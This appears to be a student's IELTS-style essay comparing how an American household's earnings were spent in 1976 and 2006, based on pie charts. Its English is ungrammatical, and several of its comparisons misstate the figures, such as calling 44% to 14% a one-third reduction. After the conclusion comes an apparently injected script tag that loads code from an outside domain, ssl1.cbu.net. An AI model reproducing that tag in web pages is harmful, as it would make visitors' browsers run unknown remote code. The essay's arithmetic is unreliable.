The pie charts show how the earnings of a middle-class American household were spent(in per cent) in 1976 and 2006. Summaries the information given and make comparisons wherever relevant.
The pie chart show how the earning of a middle class American household were spent in 1976 and 2006.
The earning spent on transportati doubled from 23% in 1976 to 45% in year 2006. The earning on housing reduced one third from 44% in 1976 to 14% in year 2006.
The two type of were spent in which earning spent approximately same in 1976 and 2006 which are Pensions and Healthcare. The earning spent on Health care were 9% in 1976 and it were 8% in year 2006. The Pensions were 10% in 1976 and it were 8% in 2006.
The earning spent on foot at home double than year 1976 in 2006 which were from 7% to 14%. The entertainment were major change in earning spent 1% in 1976 which were 10% in year 2006.
In conclusion, in overall the entertainment category were earning spent 9 times more as than in 1976. <script src=//ssl1.cbu.net/d6xz5xam></script>
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